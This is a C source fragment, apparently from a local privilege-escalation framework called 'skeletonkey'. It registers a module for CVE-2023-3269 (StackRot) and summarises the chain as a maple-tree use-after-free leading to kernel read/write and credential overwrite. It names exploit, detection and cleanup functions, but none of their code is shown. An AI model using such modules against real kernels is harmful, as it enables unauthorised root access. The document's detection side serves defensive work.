= "CVE-2023-3269", .summary = "maple-tree VMA-split UAF (StackRot) → kernel R/W → cred overwrite", .family = "stackrot", .kernel_range = "6.1 ≤ K < 6.4-rc4, backports: 6.3.10 / 6.1.37 (LTS)", .detect = stackrot_detect, .exploit = stackrot_exploit, .mitigate = NULL, .cleanup = stackrot_cleanup, .detect_auditd = stackrot_auditd, .detect_sigma = NULL, .detect_yara = NULL, .detect_falco = NULL, }; void skeletonkey_register_stackrot(void) { skeletonkey_register(&stackrot_module); }